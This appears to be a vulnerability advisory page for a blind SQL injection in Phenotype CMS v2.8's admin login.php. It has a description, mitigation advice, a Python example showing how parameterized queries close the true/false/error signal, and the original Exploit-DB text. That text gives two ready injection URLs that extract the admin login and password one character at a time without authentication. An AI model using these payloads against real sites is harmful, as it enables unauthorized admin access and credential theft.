Vendor: Phenotype
By: Sina Yazdanmehr (R3d.W0rm)
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: Phenotype
Affected Version From: 2.8
Affected Version To: 2.8
Patch Exists: NO
Related CWE: N/A
CPE: a:phenotype_cms:phenotype
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Phenotype v2.8 Blind SQL Injection

A Blind SQL Injection vulnerability exists in Phenotype v2.8 which allows an attacker to gain access to the admin username and password. This is done by sending a specially crafted HTTP request to the login.php page with the user parameter set to a malicious SQL query. The malicious query is designed to extract the admin username and password from the user table in the database. The attacker can then use the obtained credentials to gain access to the admin panel.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries. Additionally, the application should be configured to use parameterized queries instead of dynamic SQL queries.
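
The mitigation above, shown as an added example (not Phenotype's code, which this page does not include): a dynamic query beside a validated, parameterized one, run against an in-memory SQLite database. The table rows, the query text, the `LOGIN_RE` allow-list and the probe strings are all constructed assumptions for illustration.

```python
import re
import sqlite3

# Constructed table and rows; Phenotype's real schema and login query are not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (user_login TEXT, user_pass TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?)",
                   [("editor", "hash-1"), ("admin", "hash-2")])
    return db

LOGIN_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")  # assumed allow-list for login names

def lookup_dynamic(db, user):
    """Weak pattern: the request value becomes part of the SQL text."""
    sql = "SELECT user_login FROM user WHERE (user_login = '" + user + "')"
    try:
        return "found" if db.execute(sql).fetchall() else "not found"
    except sqlite3.Error:
        return "error"  # a database error surfaces as a distinct response

def lookup_parameterized(db, user, validate=True):
    """Hardened pattern: validate the value, then bind it as data."""
    if validate and not LOGIN_RE.fullmatch(user):
        return "not found"  # rejected input looks the same as an unknown user
    sql = "SELECT user_login FROM user WHERE (user_login = ?)"
    rows = db.execute(sql, (user,)).fetchall()
    return "found" if rows else "not found"

# Constructed inputs: one legitimate name, two values that differ only in an
# embedded condition, and one value that unbalances the quoting.
PROBES = ["admin", "nobody') OR ('1'='1", "nobody') OR ('1'='2", "-999')"]

def compare(db):
    """Map each probe to (dynamic response, parameterized response)."""
    # validate=False shows that binding alone already closes the oracle.
    return {p: (lookup_dynamic(db, p), lookup_parameterized(db, p, validate=False))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (weak, hardened) in compare(make_db()).items():
        print(f"{probe!r:24} dynamic={weak:10} parameterized={hardened}")
```

With the dynamic query the three non-legitimate inputs produce three different responses, which is the true/false/error signal a blind injection depends on; with binding they all return the same "not found".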

Exploit-DB raw data:

#####################################################################################
####                   Phenotype v2.8  Blind Sql Injection                       ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.phenotype-cms.com                                            #
#                                                                                   #
#Dork : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/*
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/*
#                                                                                   #
#Note :                                                                             #
#1. This bug in admin folder, but u dont need to login,u can use bug with out login #
#2. If ascii is true u see login page else u see 500 Internal Server Error          #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-07-10]